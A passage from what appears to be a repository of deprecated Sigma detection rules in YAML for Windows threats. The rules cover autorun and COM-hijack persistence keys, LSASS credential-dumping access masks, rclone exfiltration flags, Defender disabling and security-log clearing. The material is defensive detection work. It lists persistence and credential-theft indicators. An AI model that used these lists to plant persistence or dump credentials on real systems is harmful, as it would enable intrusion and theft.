- Unknown
level: high
================================================
FILE: deprecated/windows/process_creation_syncappvpublishingserver_exe.yml
================================================
title: SyncAppvPublishingServer Execution to Bypass Powershell Restriction
id: fde7929d-8beb-4a4c-b922-be9974671667
description: Detects SyncAppvPublishingServer process execution which usually utilized by adversaries to bypass PowerShell execution restrictions.
references:
- https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/
author: 'Ensar Şamil, @sblmsrsn, OSCD Community'
date: 2020/10/05
modified: 2022/04/11
tags:
- attack.defense_evasion
- attack.t1218
logsource:
product: windows
category: process_creation
detection:
selection:
Image|endswith: '\SyncAppvPublishingServer.exe'
condition: selection
falsepositives:
- App-V clients
level: medium
status: deprecated
================================================
FILE: deprecated/windows/registry_add_sysinternals_sdelete_registry_keys.yml
================================================
title: Sysinternals SDelete Registry Keys
id: 9841b233-8df8-4ad7-9133-b0b4402a9014
status: deprecated
description: A General detection to trigger for the creation or modification of .*\Software\Sysinternals\SDelete registry keys. Indicators of the use of Sysinternals SDelete tool.
references:
- https://github.com/OTRF/detection-hackathon-apt29/issues/9
- https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/4.B.2_59A9AC92-124D-4C4B-A6BF-3121C98677C3.md
author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
date: 2020/05/02
modified: 2023/02/07
tags:
- attack.defense_evasion
- attack.t1070.004
logsource:
product: windows
category: registry_add
detection:
selection:
EventType: CreateKey
TargetObject|contains: '\Software\Sysinternals\SDelete'
condition: selection
falsepositives:
- Unknown
level: medium
================================================
FILE: deprecated/windows/registry_event_asep_reg_keys_modification.yml
================================================
title: Autorun Keys Modification
id: 17f878b8-9968-4578-b814-c4217fc5768c
description: Detects modification of autostart extensibility point (ASEP) in registry.
status: deprecated
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md
- https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns
- https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d # a list with registry keys
date: 2019/10/25
modified: 2022/05/14
author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton
logsource:
category: registry_event
product: windows
level: medium
detection:
main_selection:
TargetObject|contains:
- '\SOFTWARE\Wow6432Node\Microsoft\Windows CE Services\AutoStart'
- '\Software\Wow6432Node\Microsoft\Command Processor\Autorun'
- '\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components'
- '\SOFTWARE\Microsoft\Windows CE Services\AutoStartOnDisconnect'
- '\SOFTWARE\Microsoft\Windows CE Services\AutoStartOnConnect'
- '\SYSTEM\Setup\CmdLine'
- '\Software\Microsoft\Ctf\LangBarAddin'
- '\Software\Microsoft\Command Processor\Autorun'
- '\SOFTWARE\Microsoft\Active Setup\Installed Components'
- '\SOFTWARE\Classes\Protocols\Handler'
- '\SOFTWARE\Classes\Protocols\Filter'
- '\SOFTWARE\Classes\Htmlfile\Shell\Open\Command\(Default)'
- '\Environment\UserInitMprLogonScript'
- '\SOFTWARE\Policies\Microsoft\Windows\Control Panel\Desktop\Scrnsave.exe'
- '\Software\Microsoft\Internet Explorer\UrlSearchHooks'
- '\SOFTWARE\Microsoft\Internet Explorer\Desktop\Components'
- '\Software\Classes\Clsid\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\Inprocserver32'
- '\Control Panel\Desktop\Scrnsave.exe'
session_manager_base:
TargetObject|contains: '\System\CurrentControlSet\Control\Session Manager'
session_manager:
TargetObject|contains:
- '\SetupExecute'
- '\S0InitialCommand'
- '\KnownDlls'
- '\Execute'
- '\BootExecute'
- '\AppCertDlls'
current_version_base:
TargetObject|contains: '\SOFTWARE\Microsoft\Windows\CurrentVersion'
current_version:
TargetObject|contains:
- '\ShellServiceObjectDelayLoad'
- '\Run'
- '\Policies\System\Shell'
- '\Policies\Explorer\Run'
- '\Group Policy\Scripts\Startup'
- '\Group Policy\Scripts\Shutdown'
- '\Group Policy\Scripts\Logon'
- '\Group Policy\Scripts\Logoff'
- '\Explorer\ShellServiceObjects'
- '\Explorer\ShellIconOverlayIdentifiers'
- '\Explorer\ShellExecuteHooks'
- '\Explorer\SharedTaskScheduler'
- '\Explorer\Browser Helper Objects'
- '\Authentication\PLAP Providers'
- '\Authentication\Credential Providers'
- '\Authentication\Credential Provider Filters'
nt_current_version_base:
TargetObject|contains: '\SOFTWARE\Microsoft\Windows NT\CurrentVersion'
nt_current_version:
TargetObject|contains:
- '\Winlogon\VmApplet'
- '\Winlogon\Userinit'
- '\Winlogon\Taskman'
- '\Winlogon\Shell'
- '\Winlogon\GpExtensions'
- '\Winlogon\AppSetup'
- '\Winlogon\AlternateShells\AvailableShells'
- '\Windows\IconServiceLib'
- '\Windows\Appinit_Dlls'
- '\Image File Execution Options'
- '\Font Drivers'
- '\Drivers32'
- '\Windows\Run'
- '\Windows\Load'
wow_current_version_base:
TargetObject|contains: '\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion'
wow_current_version:
TargetObject|contains:
- '\ShellServiceObjectDelayLoad'
- '\Run'
- '\Explorer\ShellServiceObjects'
- '\Explorer\ShellIconOverlayIdentifiers'
- '\Explorer\ShellExecuteHooks'
- '\Explorer\SharedTaskScheduler'
- '\Explorer\Browser Helper Objects'
wow_nt_current_version_base:
TargetObject|contains: '\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion'
wow_nt_current_version:
TargetObject|contains:
- '\Windows\Appinit_Dlls'
- '\Image File Execution Options'
- '\Drivers32'
wow_office:
TargetObject|contains: '\Software\Wow6432Node\Microsoft\Office'
office:
TargetObject|contains: '\Software\Microsoft\Office'
wow_office_details:
TargetObject|contains:
- '\Word\Addins'
- '\PowerPoint\Addins'
- '\Outlook\Addins'
- '\Onenote\Addins'
- '\Excel\Addins'
- '\Access\Addins'
- 'test\Special\Perf'
wow_ie:
TargetObject|contains: '\Software\Wow6432Node\Microsoft\Internet Explorer'
ie:
TargetObject|contains: '\Software\Microsoft\Internet Explorer'
wow_ie_details:
TargetObject|contains:
- '\Toolbar'
- '\Extensions'
- '\Explorer Bars'
wow_classes_base:
TargetObject|contains: '\Software\Wow6432Node\Classes'
wow_classes:
TargetObject|contains:
- '\Folder\ShellEx\ExtShellFolderViews'
- '\Folder\ShellEx\DragDropHandlers'
- '\Folder\ShellEx\ColumnHandlers'
- '\Directory\Shellex\DragDropHandlers'
- '\Directory\Shellex\CopyHookHandlers'
- '\CLSID\{AC757296-3522-4E11-9862-C17BE5A1767E}\Instance'
- '\CLSID\{ABE3B9A4-257D-4B97-BD1A-294AF496222E}\Instance'
- '\CLSID\{7ED96837-96F0-4812-B211-F13C24117ED3}\Instance'
- '\CLSID\{083863F1-70DE-11d0-BD40-00A0C911CE86}\Instance'
- '\AllFileSystemObjects\ShellEx\DragDropHandlers'
- '\ShellEx\PropertySheetHandlers'
- '\ShellEx\ContextMenuHandlers'
classes_base:
TargetObject|contains: '\Software\Classes'
classes:
TargetObject|contains:
- '\Folder\ShellEx\ExtShellFolderViews'
- '\Folder\ShellEx\DragDropHandlers'
- '\Folder\Shellex\ColumnHandlers'
- '\Filter'
- '\Exefile\Shell\Open\Command\(Default)'
- '\Directory\Shellex\DragDropHandlers'
- '\Directory\Shellex\CopyHookHandlers'
- '\CLSID\{AC757296-3522-4E11-9862-C17BE5A1767E}\Instance'
- '\CLSID\{ABE3B9A4-257D-4B97-BD1A-294AF496222E}\Instance'
- '\CLSID\{7ED96837-96F0-4812-B211-F13C24117ED3}\Instance'
- '\CLSID\{083863F1-70DE-11d0-BD40-00A0C911CE86}\Instance'
- '\Classes\AllFileSystemObjects\ShellEx\DragDropHandlers'
- '\.exe'
- '\.cmd'
- '\ShellEx\PropertySheetHandlers'
- '\ShellEx\ContextMenuHandlers'
scripts_base:
TargetObject|contains: '\Software\Policies\Microsoft\Windows\System\Scripts'
scripts:
TargetObject|contains:
- '\Startup'
- '\Shutdown'
- '\Logon'
- '\Logoff'
winsock_parameters_base:
TargetObject|contains: '\System\CurrentControlSet\Services\WinSock2\Parameters'
winsock_parameters:
TargetObject|contains:
- '\Protocol_Catalog9\Catalog_Entries'
- '\NameSpace_Catalog5\Catalog_Entries'
system_control_base:
TargetObject|contains: '\SYSTEM\CurrentControlSet\Control'
system_control:
TargetObject|contains:
- '\Terminal Server\WinStations\RDP-Tcp\InitialProgram'
- '\Terminal Server\Wds\rdpwd\StartupPrograms'
- '\SecurityProviders\SecurityProviders'
- '\SafeBoot\AlternateShell'
- '\Print\Providers'
- '\Print\Monitors'
- '\NetworkProvider\Order'
- '\Lsa\Notification Packages'
- '\Lsa\Authentication Packages'
- '\BootVerificationProgram\ImagePath'
filter:
- Details: '(Empty)'
- TargetObject|endswith: '\NgcFirst\ConsecutiveSwitchCount'
- Image: 'C:\WINDOWS\System32\svchost.exe'
condition: ( main_selection or
session_manager_base and session_manager or
current_version_base and current_version or
nt_current_version_base and nt_current_version or
wow_current_version_base and wow_current_version or
wow_nt_current_version_base and wow_nt_current_version or
(wow_office or office) and wow_office_details or
(wow_ie or ie) and wow_ie_details or
wow_classes_base and wow_classes or
classes_base and classes or
scripts_base and scripts or
winsock_parameters_base and winsock_parameters or
system_control_base and system_control ) and not filter
fields:
- SecurityID
- ObjectName
- OldValueType
- NewValueType
falsepositives:
- Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason
- Legitimate administrator sets up autorun keys for legitimate reason
tags:
- attack.persistence
- attack.t1547.001
================================================
FILE: deprecated/windows/registry_set_abusing_windows_telemetry_for_persistence.yml
================================================
title: Abusing Windows Telemetry For Persistence - Registry
id: 4e8d5fd3-c959-441f-a941-f73d0cdcdca5
status: deprecated
description: |
Windows telemetry makes use of the binary CompatTelRunner.exe to run a variety of commands and perform the actual telemetry collections.
This binary was created to be easily extensible, and to that end, it relies on the registry to instruct on which commands to run.
The problem is, it will run any arbitrary command without restriction of location or type.
references:
- https://www.trustedsec.com/blog/abusing-windows-telemetry-for-persistence/
author: Sreeman
date: 2020/09/29
modified: 2023/08/17
tags:
- attack.defense_evasion
- attack.persistence
- attack.t1112
- attack.t1053
logsource:
product: windows
category: registry_set
detection:
selection:
TargetObject|contains: 'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\TelemetryController\'
Details|endswith:
- '.sh'
- '.exe'
- '.dll'
- '.bin'
- '.bat'
- '.cmd'
- '.js'
- '.ps'
- '.vb'
- '.jar'
- '.hta'
- '.msi'
- '.vbs'
condition: selection
fields:
- EventID
- CommandLine
- TargetObject
- Details
falsepositives:
- Unknown
level: high
================================================
FILE: deprecated/windows/registry_set_add_hidden_user.yml
================================================
title: User Account Hidden By Registry
id: 8a58209c-7ae6-4027-afb0-307a78e4589a
status: deprecated
description: Detect modification for a specific user to prevent that user from being listed on the logon screen
references:
- https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1564.002/T1564.002.md
author: frack113
date: 2022/08/20
modified: 2023/08/17
tags:
- attack.defense_evasion
- attack.t1564.002
logsource:
product: windows
category: registry_set
detection:
selection:
TargetObject|contains: '\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist\'
TargetObject|endswith: '$'
Details: DWORD (0x00000000)
condition: selection
falsepositives:
- Unknown
level: high
================================================
FILE: deprecated/windows/registry_set_creation_service_uncommon_folder.yml
================================================
title: Service Binary in Uncommon Folder
id: c625c4c2-515d-407f-8bb6-456f65955669
status: deprecated
description: Detect the creation of a service with a service binary located in a uncommon directory
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md
author: Florian Roth (Nextron Systems)
date: 2022/05/02
modified: 2024/03/25
tags:
- attack.defense_evasion
- attack.t1112
logsource:
category: registry_set
product: windows
detection:
selection_1:
TargetObject|startswith: 'HKLM\System\CurrentControlSet\Services\'
TargetObject|endswith: '\Start'
Image|contains:
- '\AppData\Local\'
- '\AppData\Roaming\'
Details:
- 'DWORD (0x00000000)' # boot
- 'DWORD (0x00000001)' # System
- 'DWORD (0x00000002)' # Automatic
# 3 - Manual , 4 - Disabled
selection_2:
TargetObject|startswith: 'HKLM\System\CurrentControlSet\Services\'
TargetObject|endswith: '\ImagePath'
Details|contains:
- '\AppData\Local\'
- '\AppData\Roaming\'
filter:
- Image|contains:
- '\AppData\Roaming\Zoom'
- '\AppData\Local\Zoom'
- Details|contains:
- '\AppData\Roaming\Zoom'
- '\AppData\Local\Zoom'
condition: 1 of selection_* and not filter
falsepositives:
- Unknown
level: medium
================================================
FILE: deprecated/windows/registry_set_disable_microsoft_office_security_features.yml
================================================
title: Disable Microsoft Office Security Features
id: 7c637634-c95d-4bbf-b26c-a82510874b34
status: deprecated
description: Disable Microsoft Office Security Features by registry
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md
- https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/
- https://yoroi.company/research/cyber-criminal-espionage-operation-insists-on-italian-manufacturing/
author: frack113
date: 2021/06/08
modified: 2023/08/17
tags:
- attack.defense_evasion
- attack.t1562.001
logsource:
product: windows
category: registry_set
definition: key must be add to the sysmon configuration to works
# Sysmon
# \VBAWarnings
# \DisableInternetFilesInPV
# \DisableUnsafeLocationsInPV
# \DisableAttachementsInPV
detection:
selection:
TargetObject|contains: '\SOFTWARE\Microsoft\Office\'
TargetObject|endswith:
- VBAWarnings
- DisableInternetFilesInPV
- DisableUnsafeLocationsInPV
- DisableAttachementsInPV
Details: 'DWORD (0x00000001)'
condition: selection
falsepositives:
- Unknown
level: high
================================================
FILE: deprecated/windows/registry_set_malware_adwind.yml
================================================
title: Adwind RAT / JRAT - Registry
id: 42f0e038-767e-4b85-9d96-2c6335bad0b5
related:
- id: 1fac1481-2dbc-48b2-9096-753c49b4ec71
type: derived
status: deprecated
description: Detects javaw.exe in AppData folder as used by Adwind / JRAT
references:
- https://www.hybrid-analysis.com/sample/ba86fa0d4b6af2db0656a88b1dd29f36fe362473ae8ad04255c4e52f214a541c?environmentId=100
- https://www.first.org/resources/papers/conf2017/Advanced-Incident-Detection-and-Threat-Hunting-using-Sysmon-and-Splunk.pdf
author: Florian Roth (Nextron Systems), Tom Ueltschi, Jonhnathan Ribeiro, oscd.community
date: 2017/11/10
modified: 2024/03/26
tags:
- attack.execution
- attack.t1059.005
- attack.t1059.007
logsource:
category: registry_set
product: windows
detection:
selection:
TargetObject|startswith: 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'
Details|startswith: '%AppData%\Roaming\Oracle\bin\'
condition: selection
falsepositives:
- Unknown
level: high
================================================
FILE: deprecated/windows/registry_set_office_security.yml
================================================
title: Office Security Settings Changed
id: 9b894e57-033f-46cf-b7fa-a52804181973
status: deprecated
description: Detects registry changes to Office macro settings. The TrustRecords contain information on executed macro-enabled documents. (see references)
references:
- https://twitter.com/inversecos/status/1494174785621819397
- https://www.mcafee.com/blogs/other-blogs/mcafee-labs/zloader-with-a-new-infection-technique/
- https://securelist.com/scarcruft-surveilling-north-korean-defectors-and-human-rights-activists/105074/
author: Trent Liffick (@tliffick)
date: 2020/05/22
modified: 2023/08/17
tags:
- attack.defense_evasion
- attack.t1112
logsource:
category: registry_set
product: windows
detection:
selection:
TargetObject|endswith:
- '\Security\Trusted Documents\TrustRecords'
- '\Security\AccessVBOM'
- '\Security\VBAWarnings'
condition: selection
falsepositives:
- Valid Macros and/or internal documents
level: high
================================================
FILE: deprecated/windows/registry_set_persistence_com_hijacking_susp_locations.yml
================================================
title: Potential Persistence Via COM Hijacking From Suspicious Locations
id: 3d968d17-ffa4-4bc0-bfdc-f139de76ce77
related:
- id: 790317c0-0a36-4a6a-a105-6e576bf99a14
type: derived
status: deprecated
description: Detects potential COM object hijacking where the "Server" (In/Out) is pointing to a suspicious or unusual location.
references:
- https://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/ (idea)
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022/07/28
modified: 2024/07/16
tags:
- attack.persistence
- attack.t1546.015
logsource:
category: registry_set
product: windows
detection:
selection:
TargetObject|contains: '\CLSID\'
TargetObject|endswith:
- '\InprocServer32\(Default)'
- '\LocalServer32\(Default)'
Details|contains: # Add more suspicious paths and locations
- '\AppData\Local\Temp\'
- '\Desktop\'
- '\Downloads\'
- '\Microsoft\Windows\Start Menu\Programs\Startup\'
- '\System32\spool\drivers\color\' # as seen in the knotweed blog
- '\Users\Public\'
- '\Windows\Temp\'
- '%appdata%'
- '%temp%'
- '%tmp%'
condition: selection
falsepositives:
- Probable legitimate applications. If you find these please add them to an exclusion list
level: high
================================================
FILE: deprecated/windows/registry_set_persistence_search_order.yml
================================================
title: Potential Persistence Via COM Search Order Hijacking
id: a0ff33d8-79e4-4cef-b4f3-9dc4133ccd12
related:
- id: 790317c0-0a36-4a6a-a105-6e576bf99a14
type: derived
status: deprecated
description: Detects potential COM object hijacking leveraging the COM Search Order
references:
- https://www.cyberbit.com/blog/endpoint-security/com-hijacking-windows-overlooked-security-vulnerability/
author: Maxime Thiebaut (@0xThiebaut), oscd.community, Cédric Hien
date: 2020-04-14
modified: 2024-09-02
tags:
- attack.persistence
- attack.t1546.015
logsource:
category: registry_set
product: windows
detection:
selection: # Detect new COM servers in the user hive
TargetObject|contains: '\CLSID\'
TargetObject|endswith: '\InprocServer32\(Default)'
filter_main_generic:
Details|contains: # Exclude privileged directories and observed FPs
- '%%systemroot%%\system32\'
- '%%systemroot%%\SysWow64\'
filter_main_onedrive:
Details|contains:
# Related To OneDrive
- '\AppData\Local\Microsoft\OneDrive\'
- '\FileCoAuthLib64.dll'
- '\FileSyncShell64.dll'
- '\FileSyncApi64.dll'
filter_main_health_service:
Image|endswith: ':\WINDOWS\system32\SecurityHealthService.exe'
filter_main_teams:
Details|contains|all:
- '\AppData\Local\Microsoft\TeamsMeetingAddin\'
- '\Microsoft.Teams.AddinLoader.dll'
filter_main_dropbox:
Details|contains|all:
- '\AppData\Roaming\Dropbox\'
- '\DropboxExt64.*.dll'
filter_main_trend_micro:
Details|endswith: 'TmopIEPlg.dll' # TrendMicro osce
filter_main_update:
Image|endswith:
- ':\WINDOWS\system32\wuauclt.exe'
- ':\WINDOWS\system32\svchost.exe'
filter_main_defender:
Image|contains:
- ':\ProgramData\Microsoft\Windows Defender\Platform\'
- ':\Program Files\Windows Defender\'
Image|endswith: '\MsMpEng.exe'
filter_main_nvidia:
Details|contains: '\FileRepository\nvmdi.inf'
filter_main_edge:
Image|endswith: '\MicrosoftEdgeUpdateComRegisterShell64.exe'
filter_main_dx:
Image|endswith: ':\WINDOWS\SYSTEM32\dxdiag.exe'
filter_main_python:
Details|endswith:
- ':\Windows\pyshellext.amd64.dll'
- ':\Windows\pyshellext.dll'
filter_main_bonjourlib:
Details|endswith:
- ':\Windows\system32\dnssdX.dll'
- ':\Windows\SysWOW64\dnssdX.dll'
filter_main_printextensionmanager:
Details|endswith: ':\Windows\system32\spool\drivers\x64\3\PrintConfig.dll'
filter_main_programfiles:
Details|contains:
- ':\Program Files\'
- ':\Program Files (x86)\'
filter_main_programdata:
Details|contains: ':\ProgramData\Microsoft\'
filter_main_gameservice:
Details|contains: ':\WINDOWS\system32\GamingServicesProxy.dll'
filter_main_poqexec:
Image|endswith: ':\Windows\System32\poqexec.exe'
Details|contains: ':\Windows\System32\Autopilot.dll'
filter_main_sec_health_svc:
Image|endswith: ':\Windows\system32\SecurityHealthService.exe'
Details|contains: ':\Windows\System32\SecurityHealth'
filter_main_inprocserver:
Image|endswith:
- ':\Windows\System32\poqexec.exe'
- ':\Windows\System32\regsvr32.exe'
TargetObject|endswith: '\InProcServer32\(Default)'
condition: selection and not 1 of filter_main_*
falsepositives:
- Some installed utilities (i.e. OneDrive) may serve new COM objects at user-level
level: medium
================================================
FILE: deprecated/windows/registry_set_silentprocessexit.yml
================================================
title: SilentProcessExit Monitor Registration
id: c81fe886-cac0-4913-a511-2822d72ff505
status: deprecated
description: Detects changes to the Registry in which a monitor program gets registered to monitor the exit of another process
references:
- https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/
- https://www.deepinstinct.com/2021/02/16/lsass-memory-dumps-are-stealthier-than-ever-before-part-2/
author: Florian Roth (Nextron Systems)
date: 2021/02/26
modified: 2023/08/17
tags:
- attack.persistence
- attack.t1546.012
logsource:
category: registry_set
product: windows
detection:
selection:
TargetObject|contains: 'Microsoft\Windows NT\CurrentVersion\SilentProcessExit'
Details|contains: 'MonitorProcess'
condition: selection
falsepositives:
- Unknown
level: high
================================================
FILE: deprecated/windows/sysmon_accessing_winapi_in_powershell_credentials_dumping.yml
================================================
title: Accessing WinAPI in PowerShell for Credentials Dumping
id: 3f07b9d1-2082-4c56-9277-613a621983cc
status: deprecated
description: Detects Accessing to lsass.exe by Powershell
references:
- https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse
author: oscd.community, Natalia Shornikova
date: 2020/10/06
modified: 2022/12/18
tags:
- attack.credential_access
- attack.t1003.001
logsource:
product: windows
service: sysmon
detection:
selection:
EventID:
- 8
- 10
SourceImage|endswith:
- '\powershell.exe'
- '\pwsh.exe'
TargetImage|endswith: '\lsass.exe'
condition: selection
falsepositives:
- Unknown
level: high
================================================
FILE: deprecated/windows/sysmon_dcom_iertutil_dll_hijack.yml
================================================
title: DCOM InternetExplorer.Application Iertutil DLL Hijack - Sysmon
id: e554f142-5cf3-4e55-ace9-a1b59e0def65
status: deprecated
description: Detects a threat actor creating a file named `iertutil.dll` in the `C:\Program Files\Internet Explorer\` directory over the network and loading it for a DCOM InternetExplorer DLL Hijack scenario.
references:
- https://threathunterplaybook.com/hunts/windows/201009-RemoteDCOMIErtUtilDLLHijack/notebook.html
author: Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR), wagga
date: 2020/10/12
modified: 2022/12/18
tags:
- attack.lateral_movement
- attack.t1021.002
- attack.t1021.003
logsource:
product: windows
service: sysmon
detection:
selection_one:
EventID: 11
Image: System
TargetFilename|endswith: '\Internet Explorer\iertutil.dll'
selection_two:
EventID: 7
Image|endswith: '\Internet Explorer\iexplore.exe'
ImageLoaded|endswith: '\Internet Explorer\iertutil.dll'
condition: 1 of selection_*
falsepositives:
- Unknown
level: critical
================================================
FILE: deprecated/windows/sysmon_mimikatz_detection_lsass.yml
================================================
title: Mimikatz Detection LSASS Access
id: 0d894093-71bc-43c3-8c4d-ecfc28dcf5d9
status: deprecated
description: Detects process access to LSASS which is typical for Mimikatz (0x1000 PROCESS_QUERY_ LIMITED_INFORMATION, 0x0400 PROCESS_QUERY_ INFORMATION "only old
versions", 0x0010 PROCESS_VM_READ)
references:
- https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow
- https://web.archive.org/web/20230208123920/https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html
tags:
- attack.t1003
- attack.s0002
- attack.credential_access
- car.2019-04-004
author: Sherif Eldeeb
date: 2017/10/18
modified: 2022/04/11
logsource:
product: windows
category: process_access
detection:
selection:
TargetImage|endswith: '\lsass.exe'
GrantedAccess:
- '0x1410'
- '0x1010'
- '0x410'
filter:
SourceImage|startswith:
- 'C:\Program Files\WindowsApps\'
- 'C:\Windows\System32\'
SourceImage|endswith: '\GamingServices.exe'
condition: selection and not filter
fields:
- ComputerName
- User
- SourceImage
falsepositives:
- Some security products access LSASS in this way.
level: high
================================================
FILE: deprecated/windows/sysmon_powershell_execution_moduleload.yml
================================================
title: PowerShell Execution
id: 867613fb-fa60-4497-a017-a82df74a172c
description: Detects execution of PowerShell
status: deprecated
date: 2019/09/12
modified: 2021/11/05
author: Roberto Rodriguez @Cyb3rWard0g
references:
- https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190410151110.html
tags:
- attack.execution
- attack.t1086 # an old one
- attack.t1059.001
logsource:
category: image_load
product: windows
detection:
selection:
Description: 'System.Management.Automation'
ImageLoaded|contains: 'System.Management.Automation'
condition: selection
fields:
- ComputerName
- Image
- ProcessID
- ImageLoaded
falsepositives:
- Unknown
level: medium
================================================
FILE: deprecated/windows/sysmon_rclone_execution.yml
================================================
title: RClone Execution
id: a0d63692-a531-4912-ad39-4393325b2a9c
status: deprecated
description: Detects execution of RClone utility for exfiltration as used by various ransomwares strains like REvil, Conti, FiveHands, etc
tags:
- attack.exfiltration
- attack.t1567.002
author: Bhabesh Raj, Sittikorn S
date: 2021/05/10
modified: 2022/04/11
references:
- https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware
- https://us-cert.cisa.gov/ncas/analysis-reports/ar21-126a
- https://labs.sentinelone.com/egregor-raas-continues-the-chaos-with-cobalt-strike-and-rclone
- https://www.splunk.com/en_us/blog/security/darkside-ransomware-splunk-threat-update-and-detections.html
fields:
- CommandLine
- ParentCommandLine
- Details
falsepositives:
- Legitimate RClone use
level: high
logsource:
category: process_creation
product: windows
detection:
selection:
Description: 'Rsync for cloud storage'
selection2:
CommandLine|contains|all:
- '--config '
- '--no-check-certificate '
- ' copy '
selection3:
Image|endswith:
- '\rclone.exe'
CommandLine|contains:
- 'mega'
- 'pcloud'
- 'ftp'
- '--progress'
- '--ignore-existing'
- '--auto-confirm'
- '--transfers'
- '--multi-thread-streams'
condition: 1 of selection*
================================================
FILE: deprecated/windows/win_defender_disabled.yml
================================================
title: Windows Defender Threat Detection Disabled
id: fe34868f-6e0e-4882-81f6-c43aa8f15b62
status: deprecated
description: Detects disabling Windows Defender threat protection
references:
- https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-antivirus/troubleshoot-windows-defender-antivirus
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md
author: Ján Trenčanský, frack113
date: 2020/07/28
modified: 2023/11/22
tags:
- attack.defense_evasion
- attack.t1562.001
logsource:
product: windows
service: windefend
detection:
selection:
EventID:
- 5001 # Real-time protection is disabled.
- 5010 # Scanning for malware and other potentially unwanted software is disabled.
- 5012 # Scanning for viruses is disabled.
- 5101 # The antimalware platform is expired.
condition: selection
falsepositives:
- Administrator actions (should be investigated)
- Seen being triggered occasionally during Windows 8 Defender Updates
level: high
================================================
FILE: deprecated/windows/win_dsquery_domain_trust_discovery.yml
================================================
title: Domain Trust Discovery
id: 77815820-246c-47b8-9741-e0def3f57308
status: deprecated
description: Detects a discovery of domain trusts.
references:
- https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md
author: Jakob Weinzettl, oscd.community
date: 2019/10/23
modified: 2023/02/04
tags:
- attack.discovery
- attack.t1482
logsource:
category: process_creation
product: windows
detection:
selection:
- Image|endswith: '\dsquery.exe'
CommandLine|contains|all:
- '-filter'
- 'trustedDomain'
- Image|endswith: '\nltest.exe'
CommandLine|contains: 'domain_trusts'
condition: selection
falsepositives:
- Administration of systems.
level: medium
================================================
FILE: deprecated/windows/win_lateral_movement_condrv.yml
================================================
title: Lateral Movement Indicator ConDrv
id: 29d31aee-30f4-4006-85a9-a4a02d65306c
status: deprecated #Too many FP
description: This event was observed on the target host during lateral movement. The process name within the event contains the process spawned post compromise. Account Name within the event contains the compromised user account name. This event should to be correlated with 4624 and 4688 for further intrusion context.
author: Janantha Marasinghe
date: 2021/04/27
modified: 2022/05/14
references:
- https://jpcertcc.github.io/ToolAnalysisResultSheet/details/wmiexec-vbs.htm
- https://www.fireeye.com/blog/threat-research/2017/08/monitoring-windows-console-activity-part-one.html
tags:
- attack.lateral_movement
- attack.execution
- attack.t1021
- attack.t1059
logsource:
product: windows
service: security
detection:
selection:
EventID: 4674
ObjectServer: 'Security'
ObjectType: 'File'
ObjectName: '\Device\ConDrv'
condition: selection
falsepositives:
- Legal admin action
level: low
================================================
FILE: deprecated/windows/win_security_event_log_cleared.yml
================================================
title: Security Event Log Cleared
id: a122ac13-daf8-4175-83a2-72c387be339d
status: deprecated
description: Checks for event id 1102 which indicates the security event log was cleared.
references:
- https://github.com/Azure/Azure-Sentinel/blob/f99542b94afe0ad2f19a82cc08262e7ac8e1428e/Detections/SecurityEvent/SecurityEventLogCleared.yaml
author: Saw Winn Naung
date: 2021/08/15
modified: 2023/12/06
tags:
- attack.t1070.001
logsource:
service: security
product: windows
detection:
selection:
EventID: 1102
Provider_Name: Microsoft-Windows-Eventlog
condition: selection
falsepositives:
- Legitimate administrative activity
fields:
- SubjectLogonId
- SubjectUserName
- SubjectUserSid
- SubjectDomainName
level: medium
================================================
FILE: deprecated/windows/win_security_group_modification_logging.yml
================================================
title: Group Modification Logging
id: 9cf01b6c-e723-4841-a868-6d7f8245ca6e
status: deprecated
description: |
Configure systems to issue a log entry and alert when an account is added to or removed from any group assigned administrative privileges.
Sigma detects
Event ID 4728 indicates a "Member is added to a Security Group".
Event ID 4729 indicates a "Member is removed from a Security enabled-group".
Event ID 4730 indicates a "Security Group is deleted".
The case is not applicable for Unix OS.
Supported OS - Windows 2008 R2 and 7, Windows 2012 R2 and 8.1, Windows 2016 and 10 Windows Server 2019, Windows Server 2000, Windows 2003 and XP.
references:
- https://www.cisecurity.org/controls/cis-controls-list/
